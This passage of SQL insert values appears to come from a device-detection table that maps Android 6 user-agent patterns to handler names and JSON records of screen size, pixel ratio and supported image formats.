Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Benefit_S453) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Blade A310) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Blade A510) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Blade V6 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Bluboo D2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Bluboo Dual) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Bluboo Maya Max) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Bluboo Mini) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Bmobile_AX685) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Boost 3 Pro SE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Boost 3 SE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Boost3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Brand) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Brondi 620 SZ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; C-Smart_pix) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; C1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; C1-U02) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; C1001) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; C103) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; C106) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; C106-8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; C106-9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; C107-9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; C3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; C4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; C5 PRO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; C5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; C552) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; CAM-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; CAM-L03) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; CAM-L21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; CAM-L23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; CAM-L32) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; CAM-UL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; CASPER_VIA_E2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; CASPER_VIA_M1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; CASPER_VIA_M2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; CHC-U01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; CHEETAH) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; CHM-U01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; COTO_T40017) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; CPH1607) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; CPH1609) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; CPH1611) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; CPH1613) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; CPH1701) AppleWebKit/* (KHTML, like Gecko) Chrome','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; CPH1701) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; CPH1715) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; CRO-L02) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; CRO-L03) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; CRO-L22) AppleWebKit/* (KHTML, like Gecko) Chrome (lite) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; CRO-L22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; CRO-L23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; CRO-U00) AppleWebKit/* (KHTML, like Gecko) Chrome (lite) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; CRO-U00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; CRR-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; CS24) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; CUBOT DINOSAUR) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; CUBOT ECHO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; CUBOT MAX) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; CUBOT_MANITO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; CUBOT_NOTE_S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Cameleon C4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Candy) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Che2-L11) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Che2-L23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Coolpad 3600I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_coolpad','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Coolpad E502) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_coolpad','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Coolpad E503) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_coolpad','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Coolpad E570) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_coolpad','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Coolpad R116) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_coolpad','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Coolpad Y83-I00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_coolpad','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Cosmos V23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Cumulus_5.5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Curvy C50L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; D4000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; D455) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; D504) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; D5803) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; D5833) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; D6502) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; D6503) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; D6543) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; D6563) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; D6603) AppleWebKit/* 